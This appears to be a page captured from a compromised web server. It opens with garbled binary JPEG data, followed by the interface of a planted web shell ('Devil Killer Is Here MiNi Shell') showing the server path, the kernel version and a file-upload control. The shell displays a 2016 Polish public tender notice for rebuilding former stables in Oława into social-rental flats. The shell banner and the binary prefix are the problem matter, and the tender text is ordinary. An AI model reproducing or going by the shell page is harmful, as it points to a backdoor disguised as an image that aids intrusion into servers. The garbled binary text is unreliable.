JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161216/368408-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.tbskg.com.pl' target='_blank'>http://www.tbskg.com.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 368408 - 2016
              z dnia 2016-12-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kamienna Góra: Wykonanie robót budowlanych dla zadania inwestycyjnego: Przebudowa, nadbudowa i zmiana sposobu użytkowania istniejących budynków ujeżdżalni i stajni wraz z wewnętrznymi instalacjami z przeznaczeniem na budynek mieszkalno-usługowy w Oławie przy ul. 3 Maja<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Towarzystwo Budownictwa Społecznego "TBS" Sp. z o.o., krajowy numer identyfikacyjny
              23028994000000, ul.
              ul. Sienkiewicza 
              7,
              58400  
              Kamienna Góra, woj.
              dolnośląskie, państwo
              Polska, tel.
              757 442 614, e-mail
              tbs@tbskg.com.pl, faks
              757 447 811.
              <br />
              Adres strony internetowej (URL): www.tbskg.co.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Twarzystwa Budownictwa Społecznego - spółka z ograniczoną odpowiedzialnością</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.tbskg.com.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.tbskg.com.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Towarzystwo Budownictwa Społecznego TBS Sp. z o.o., sekretariat II piętro<br />
                Adres:
                <br />58 - 400 Kamienna Góra, ul. Sienkiewicza 7</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie robót budowlanych dla zadania inwestycyjnego: Przebudowa, nadbudowa i zmiana sposobu użytkowania istniejących budynków ujeżdżalni i stajni wraz z wewnętrznymi instalacjami z przeznaczeniem na budynek mieszkalno-usługowy w Oławie przy ul. 3 Maja<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.1.Kod CPV: 45211340-4 Roboty budowlane w zakresie budownictwa wielorodzinnego

1.2. Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania inwestycyjnego pn.:  Przebudowa, nadbudowa i zmiana sposobu użytkowania istniejących budynków ujeżdżalni i stajni wraz z wewnętrznymi instalacjami z przeznaczeniem na budynek mieszkalno-usługowy w Oławie przy ul. 3 Maja .
Budynki stajni i ujeżdżalni, na których wykonane mają być roboty budowlane w ramach niniejszego zamówienia, wchodzą w skład zespołu dawnych koszar przy ul. 3 Maja w Oławie i wpisane są do rejestru zabytków decyzją nr A/4002/678/W z dnia 02.04.1993 r. Od kilkudziesięciu lat przedmiotowe budynki są opuszczone i nie użytkowane, co jest przyczyną częściowej korozji ścian nośnych zewnętrznych wykonanych z cegły pełnej.
Część kompleksu została przebudowana i zaadaptowana na budynek mieszkalno-usługowy i oddana do użytkowania 31 stycznia 2013 r. Z dachu budynku ujeżdżalni w 2015 roku dokonano rozbiórki i utylizacji pokrycia wykonanego z płyt falistych azbestowych.
Przebudowa dawnych stajni i ujeżdżalni ma na celu dostosowanie obiektu do funkcji mieszkalno  usługowej. W ramach niniejszego zamówienia należy wykonać 46 lokali mieszkalnych o łącznej powierzchni  2 292,40 m2 wraz z pomieszczeniami przynależnymi oraz komunikacją ogólną i klatkami schodowymi  lokale usługowe, jakie znajdować się będą w części parterowej budynku, wykonane będą w ramach odrębnego zadania, według odrębnego opracowania projektowego i odrębnego pozwolenia na budowę. W ramach niniejszego przedmiotu zamówienia zrealizowane zostaną dla części usługowej tylko niezbędne prace, które ze względów technicznych nie mogą być wyłączone oraz prace związane z przebudową obiektu jako całości, stanowiące część wspólną dla części mieszkalnej i usługowej, tj.:
	wykonanie przyłącza wodno-kanalizacyjnego, przyłączy energetycznych, instalacji odprowadzających wody deszczowe;
 rozprowadzenie kanalizacji z części mieszkalnej i zaślepienie podejść odpływowych dla części parterowej/usługowej;
 w rozdzielniach elektrycznych pozostawienie złącza na włączenie części parterowej/usługowej; pomiar zużycia energii elektrycznej części parterowej/usługowej zgodny będzie z wydanymi przez TAURON DYSTRYBUCJA warunkami technicznymi;
 w rozdzielni elektrycznej pozostawienie miejsce na złącza teletechniczne takie jak: Internet, TV, telefonia;
 pozostawienie podejść dopływowych wodnych dla części parterowej/usługowej z miejscem na liczniki wody;
 wykonanie kanałów wentylacyjnych dla części parterowej/usługowej.
 wykonanie tynku zewnętrznego elewacji, w części parterowej renowacyjnego do wysokości gzymsu pod oknami drugiej kondygnacji;
 zakup i montaż stolarki okiennej i drzwiowej zewnętrznej (wejścia główne do lokali usługowych i klatek schodowych mieszkań, stolarka okienna całego budynku);
Komunikację wewnętrzną obiektu projektowanego zapewniają klatki schodowe i korytarze wewnętrzne. Dojścia do klatek schodowych od strony wnętrza działki nr 23/71 i 23/76. Układ dojść pieszych powiązany z zespołem miejsc postojowych  zgodnie z projektem zagospodarowania terenu. Budynek realizowany w technologii tradycyjnej. Zadaszenie, stropy, izolacje termiczne, izolacje przeciwwilgociowe, wentylację mechaniczną (rekuperacja),instalacje sanitarne, instalacje elektryczne, co, cwu, tynki i okładziny ścian zewnętrznych, tynki ścian wewnętrznych, posadzki i podłogi, roboty stolarskie, ślusarskie i malarskie należy wykonać zgodnie z dokumentacją projektową. Produkcja energii na potrzeby centralnego ogrzewania oraz ciepłej wody użytkowej odbywać się będzie za pomocą gruntowych pomp ciepła, których zakup, montaż, uruchomienie oraz bezpłatne serwisowanie przez okres co najmniej dwóch lat  wraz z dokonaniem odwiertów jest elementem przedmiotu zamówienia (zgodnie z dokumentacją techniczną). 
Przedmiot umowy ma być oddany Zamawiającemu w stanie nadającym się do użytkowania:
a) Część budynku zaprojektowana jako mieszkalna  zgodnie z projektem o standardzie  pod klucz .  Część mieszkalna  budynku wykonana ma być kompleksowo wraz z klatkami schodowymi, komunikacją i pomieszczeniami przynależnymi: komórki lokatorskie, suszarnie, wózkownie, pomieszczenia techniczne i pomieszczenia gospodarcze (wraz z montażem urządzeń i armaturą sanitarną zgodnie z projektem), dwa pomieszczenia do przechowywania gąsienicowych transporterów schodowych wraz z oświetleniem i gniazdem wtykowym do ładowania tych urządzeń, pomieszczenie techniczne wraz z pompami ciepła oraz opisanie ww. pomieszczeń. Należy wykonać m.in.:
 do każdej kuchni należy zakupić  i dostarczyć kuchenkę elektryczną z ceramiczną płytą czteropalnikową i piekarnikiem oraz ją zamontować i uruchomić;
 do każdej łazienki należy zakupić, dostarczyć i zamontować wannę/brodzik/kabinę natryskową (zgodnie z dokumentacją techniczną), umywalkę oraz miskę ustępową;
 w każdym WC zakupić i zamontować umywalkę, kompakt oraz niezbędny do ich funkcjonowania osprzęt;
 w pomieszczeniach wskazanych w dokumentacji zamontować regulatory temperatury;
 we wszystkich pomieszczeniach należy zamontować osprzęt elektryczny (włączniki, gniazda);
 elementy wyposażenia pomieszczeń kuchni, pokoi, przedpokoi, łazienek, WC, pomieszczeń technicznych i gospodarczych muszą być oddane w stanie kompletnym i pozwalającym na użytkowanie ich zgodnie z przeznaczeniem.

Część budynku zaprojektowana jako usługowa  zgodnie z wytycznymi akapitu poprzedniego; prace części mieszkalnej i usługowej wykonać należy w taki sposób, aby można było bez naruszenia części mieszkalnej i ogólnej (elementów konstrukcyjnych) kontynuować roboty wykończeniowe w lokalach usługowych.
c)	Wykonanie dziedzińca wraz z częścią terenu zielonego, miejsc postojowych, dróg dojazdowych, oświetlenia terenu, odprowadzenia wód opadowych i roztopowych oraz opaski wokół budynku zgodnie z projektem zagospodarowania terenu.
d)	Wykonanie innych prac i robót budowlanych, tj:
	zakup i montaż euro skrzynek na przesyłki zgodnie z obowiązującymi przepisami;
	zakup i montaż tablicy ogłoszeniowej (zamykanej na klucz) na każdej klatce schodowej;
	zakup i montaż na dachu drabinek zapobiegających osuwaniu się śniegu;
	zakup i dostawa dwóch schodołazów gąsienicowych dla osób niepełnosprawnych;
	zabezpieczenie wlotów kominowych przed możliwością zakładania gniazd przez ptactwo lub podobnych w ich wnętrzu oraz kolców na gzymsach, pilastrach i elementach wystających elewacji ;
	w wiatrołapach osadzić w płytkach posadzkowych wycieraczki do obuwia o wymiarach minimum 100 cm X 60 cm;
	posadzki pomieszczeń, w których Wykonawca zamontuje pompy ciepła i bufory, wyłożyć płytkami ceramicznymi a ściany wyłożyć  płytkami do wysokości 250 cm;
	kompletne opomiarowanie mediów mieszkań (lokalizacja w części klatek schodowych) licznikami tożsamymi z rodzajem mediów, wraz z ich oplombowaniem oraz pozostawienie miejsc pod zamontowanie urządzeń pomiarowych dla lokali usługowych;
	trwała numeracja liczników (numer mieszkania = numer licznika);
	ponumerowanie mieszkań w sposób trwały zgodnie z ruchem wskazówek zegara;
	płytki ceramiczne na klatkach schodowych i ciągach komunikacyjnych stosować wielkoformatowe , o wymiarach minimum 60 X 30 cm;
	budynek należy wyposażyć w podstawowe media techniczne tj. gniazda tel., TV, RTV;
	zakup i przekazanie Zamawiającemu kluczy do drzwi wejściowych (domofonu), wózkowni, suszarni, wszystkich pomieszczeń i szafek z licznikami w ilości mieszkań + 2 sztuki dla Zamawiającego;
	trwałe oznaczenia numeru klatki schodowej budynku mieszkalnego tj. nr administracyjny na oświetleniu nad wejściem  analogicznie jak oznakowanie klatek 18f-18i.
Informacje dodatkowe: 
W trakcie realizacji prac budowlanych należy zapewnić bezkolizyjne dojście do kompleksu użytkowników skrzydła północnego i lewej strony skrzydła wschodniego kompleksu, w których się mieszczą lokale mieszkalne, Miejski Ośrodek Pomocy Społecznej, Zespół Obsługi Szkół i Placówek Opiekuńczo-Wychowawczych oraz Biura Organizacji Pozarządowych.

1.3.	Szczegóły dotyczące zakresu robót budowlanych oraz nadania nowego układu pomieszczeń i sposobu ich użytkowania a także innych wymagań technicznych opisuje dokumentacja projektowa składająca się z projektów budowlanych i wykonawczych oraz specyfikacji technicznej wykonania i odbioru robót jak niżej: 
	projekt architektoniczno-budowlany  architektura, konstrukcja, instalacje sanitarne, instalacje elektryczne
	projekt zagospodarowania terenu - drogi, przyłącza wod-kan
zatwierdzone decyzją Starosty Oławskiego Nr 944/2015 z dnia 15.10.2015 r.
	projekt wykonawczy  architektura
	projekt wykonawczy  konstrukcja
	projekt wykonawczy  instalacje sanitarne
	projekt wykonawczy  instalacje elektryczne
	projekt wykonawczy  przyłącza wod-kan
	projekt wykonawczy  drogi, dojścia i parkingi 
	projekt wykonawczy  instalacja centralnego ogrzewania/chłodzenia pasywnego
	specyfikacja techniczna wykonania i odbioru robót  roboty ogólnobudowlane
	specyfikacja techniczna wykonania i odbioru robót  przyłącze wodno-kanalizacyjne
	specyfikacja techniczna wykonania i odbioru robót  instalacja sanitarna
	specyfikacja techniczna wykonania i odbioru robót  instalacja elektryczna
	specyfikacja techniczna wykonania i odbioru robót  drogi, dojścia i parkingi
wraz z projektem zmian:
	projekt zagospodarowania terenu  projekt zmian nr 1 (Zamawiający informuje, że jest w trakcie uzyskania decyzji zatwierdzającej projekt zmian nr 1  w dniu 17.11.2016 r. zostało wszczęte postępowanie administracyjne w zakresie zmiany decyzji nr 944/2015 z dnia 15.10.2015 r.)
stanowiące załącznik nr 8 do SIWZ, które zostały opracowane przez  Autorską Pracownię Architektury  ARC-HIT  Spółka z o.o. z siedzibą przy ul. Różanej 10, 53-226 Wrocław, pracownia: ul. Kościuszki 76A, 50-442 Wrocław.
Powierzchnie użytkowe pomieszczeń do wykonania w ramach zamówienia obowiązują wg projektu wykonawczego.
Zamawiający, w trakcie realizacji umowy, zastrzega sobie prawo do dokonania zmian względem zapisów zawartych w dokumentacji projektowej, jeśli nie będą one w sposób istotny naruszały ich treść.
Zamawiający zachęca Wykonawców do  zapoznania się w terenie z obiektem, który jest przedmiotem zamówienia.
Załączniki do opisu przedmiotu zamówienia:
a)	dokumentacja projektowa określona w pkt. 3.3.  załącznik nr 8
b)	decyzja nr 944/2015 z dnia 15.10.2015 r. Starosty Oławskiego zatwierdzająca projekt budowlany i zezwalająca na budowę dla zadania pn. Przebudowa, nadbudowa i zmiana sposobu użytkowania istniejących budynków ujeżdżalni i stajni wraz z wewnętrznymi instalacjami z przeznaczeniem na budynek mieszkalno-usługowy w Oławie przy ul. 3 Maja  załącznik nr 9
c)	decyzja nr 1668/2015 z dnia 01.09.2015 r. Dolnośląskiego Wojewódzkiego Konserwatora Zabytków zezwalająca na prowadzenie robót budowlanych załącznik nr 10
d)	decyzja nr 1667/2015 z dnia 01.09.2015 r. Dolnośląskiego Wojewódzkiego Konserwatora Zabytków zezwalająca na prowadzenie badań archeologicznych załącznik nr 11
e)	ekspertyza stanu technicznego budynku (kwiecień 2014)  załącznik nr 7
f)	przedmiary  załącznik nr 12 Zamawiający zaznacza, że załączone przedmiary robót nie stanowią podstawy do obliczenia ceny oferty  mogą one tylko stanowić pomoc dla wykonawcy w przygotowaniu oferty. Wykonawca cenę oferty musi obliczyć na podstawie dokumentacji projektowej uwzględniając zakres zamówienia określony w projekcie, SIWZ i specyfikacjach technicznych wykonania i odbioru robót.

1.4.	Zamawiający wymaga, aby dla wskazanych czynności związanych z realizacją robót budowlanych określonych w dokumentacji projektowej stanowiące załącznik nr 8 do SIWZ, Wykonawca lub podwykonawca zatrudnił osoby wykonujące te roboty budowlane, tj.: 
a)	prace przygotowawcze, rozbiórkowe i porządkowe;
b)	roboty murowe i betoniarskie;
c)	roboty izolacyjne;
d)	roboty tynkarskie; 
e)	roboty malarskie;
f)	roboty posadzkowe i okładzinowe;
g)	roboty montażowe instalacji i urządzeń sanitarnych i grzewczych;
h)	roboty montażowe instalacji i urządzeń elektrycznych i teletechnicznych;
i)	roboty kamieniarsko-brukarskie;
j)	roboty stolarskie i ciesielskie;
k)	roboty wiertnicze;
l)	roboty spawalnicze;
m)	roboty dekarskie i blacharskie;
n)	roboty związane z docieplaniem budynków. 
 Zatrudnienie na podstawie umowy o pracę wskazanych przez Wykonawcę osób powinno trwać nieprzerwanie przez cały okres trwania umowy. 
W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w pkt. a) do n) czynności. Zamawiający uprawniony jest w szczególności do:  
a)	żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny;
b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów;
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia. 
W trakcie realizacji zamówienia na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie Wykonawca przedłoży według wyboru Zamawiającego wskazane poniżej dowody, w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub  podwykonawcę  osób  wykonujących wskazane wyżej czynności w trakcie realizacji zamówienia: 
a)	Oświadczenie Wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności:  dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lub podwykonawcy; 
b)	Poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. w szczególności bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania.
c)	Zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy.
d)	Poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. 
Z tytułu niespełnienia przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane wyżej czynności Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary umownej określonej w Istotnych dla stron postanowieniach umowy. Niezłożenie przez Wykonawcę w wyznaczonym przez Zamawiającego terminie żądanych przez Zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane wyżej czynności. 
W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę lub podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. 

UWAGA: 
Przedmiot zamówienia obejmuje budowę budynku z mieszkaniami na wynajem, w oparciu o program społecznego budownictwa czynszowego, realizowany na gruncie Ustawy z dnia 26 października 1995 r. o niektórych formach popierania budownictwa mieszkaniowego.
Realizacja zadania nastąpi w przypadku uzyskania przez Zamawiającego finansowania zwrotnego z rządowego programu popierania budownictwa mieszkaniowego na przedsięwzięcie będące przedmiotem zamówienia. W przypadku nieuzyskania ww. finansowania Zamawiający zastrzega sobie prawo odstąpienia od umowy, a Wykonawca nie będzie dochodził od Zamawiającego żadnych roszczeń związanych z tym odstąpieniem od umowy (art. 395 § 1 k.c. oraz art. 145 ust. 1 ustawy  Prawo zamówień publicznych).
Informacje dodatkowe: 
Zamawiający informuje, że wystąpił z wnioskiem o dofinansowanie projektu w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2014  2020, Działanie 6.3  Rewitalizacja zdegradowanych obszarów , typ projektów 6.3 B  Remont, przebudowę, rozbudowę, adaptację, wyposażenie istniejących zdegradowanych budynków, obiektów, zagospodarowania terenów i przestrzeni (np. monitoring miejski lub dostosowanie przestrzeni do potrzeb osób niepełnosprawnych)  w celu przywrócenia lub nadania im nowych funkcji społecznych, kulturalnych, gospodarczych, edukacyjnych lub rekreacyjnych <br /><br /><b>II.5) Główny kod CPV: </b>45211340-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
